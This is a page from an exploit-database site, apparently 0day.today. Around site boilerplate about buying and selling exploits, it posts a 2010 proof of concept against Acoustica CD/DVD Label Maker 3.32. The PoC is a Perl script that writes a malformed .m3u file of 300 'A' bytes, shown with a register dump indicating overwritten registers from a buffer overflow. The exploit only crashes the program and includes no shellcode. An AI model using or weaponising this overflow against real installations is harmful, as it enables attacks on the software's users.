0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Acoustica v. 3.32 cd/dvd label maker .m3u PoC
============================================= Acoustica v. 3.32 cd/dvd label maker .m3u PoC ============================================= # Exploit Title: Acoustica cd/dvd label maker .m3u PoC # Date: April 27,2010 # Software Link: [http://www.acoustica.com/cd-label-maker/] # Version: 3.32 # Tested on: Windows XP Sp3/Windows 7 # Author: chap0 # Email: chap0x90 at gmail dot com # # Contacted Vendor Apr 19, 2010 # Auto Reply Support Ticket ID:155626 Apr 19 2010 # No further communication from vendor # # Greetz and Thanks to mr_me # # # EAX 00000041 # ECX 0000012C # EDX 000DE9A8 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA. . ." # EBX 000004EA # ESP 000DE960 # EBP 000DEBB8 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" # ESI 00410041 cdlabel.00410041 # EDI 00410041 cdlabel.00410041 # EIP 00605216 cdlabel.00605216 # #!/usr/bin/perl $file = "boom.m3u"; $junk = "\x41" x 300; print "Creating Nasty .m3u file\n"; open (FILE, ">$file"); print FILE "$junk"; close FILE; print "Done\n"; # 0day.today [2024-12-25] #